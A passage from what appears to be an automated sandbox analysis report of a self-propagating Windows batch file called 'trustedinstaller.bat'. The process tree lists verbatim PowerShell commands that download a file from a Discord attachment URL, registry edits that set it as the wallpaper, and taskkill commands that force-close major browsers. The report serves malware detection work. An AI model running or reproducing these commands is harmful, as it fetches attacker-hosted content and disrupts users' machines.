        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:6008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:1856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:2384
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6404
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
    3⤵
    PID:2828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1772
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3512
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:5020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:5944
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:3696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:6312
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7488
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
    3⤵
    PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "chrome.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1288
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "firefox.exe"
    3⤵
    PID:2384
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "msedge.exe"
    3⤵
    - Kills process with taskkill
    PID:4944
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "opera.exe"
    3⤵
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2904
- - C:\Windows\system32\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:3060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2628
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3728
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2000
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:5780
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2508
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6140
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4576
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5340
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:1540
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:740
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6764
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4112
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5796
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:5876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4016
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4212
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:2936
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:5388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
    3⤵
    PID:2120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2160
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:872
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:5956
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:2244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7512
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
    3⤵
    PID:2956
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1856
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1680
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:6632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:9968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:5008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:4852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:4116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
    3⤵
    PID:2612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2572
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:2556
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2936
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:8556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4272
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:8932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3728
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:8916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:4724
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:8576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:4524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:8924
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
    3⤵
    PID:2032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
